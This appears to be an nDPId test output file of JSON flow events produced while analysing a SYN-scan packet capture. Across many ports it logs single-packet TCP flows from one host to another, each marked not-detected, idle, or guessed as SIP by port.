+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":806,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059737,"flow_last_seen":1278275059737,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3006,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":806,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059737,"flow_last_seen":1278275059737,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3006,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1676,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7103,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1676,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7103,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1666,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5054,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1666,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5054,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":869,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3007,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":869,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":849,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3006,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":849,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3006,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1751,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7103,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1751,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7103,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":936,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3007,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":936,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1042,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7106,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1042,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7106,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1689,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3011,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1689,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3011,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7106,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7106,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1768,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3011,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1768,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3011,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00642{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":889,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5060,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":889,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5060,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1849,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3013,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1849,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3013,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1778,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061107,"flow_last_seen":1278275061107,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5061,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1778,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061107,"flow_last_seen":1278275061107,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5061,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00642{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":966,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5060,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":966,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5060,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1912,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3013,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1912,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3013,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1879,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5061,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1879,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5061,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3017,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":306,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3017,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":306,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1796,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":23502,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1796,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":23502,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1861,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":23502,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1861,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":23502,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":341,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":48080,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":341,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":48080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":361,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":48080,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":361,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":48080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
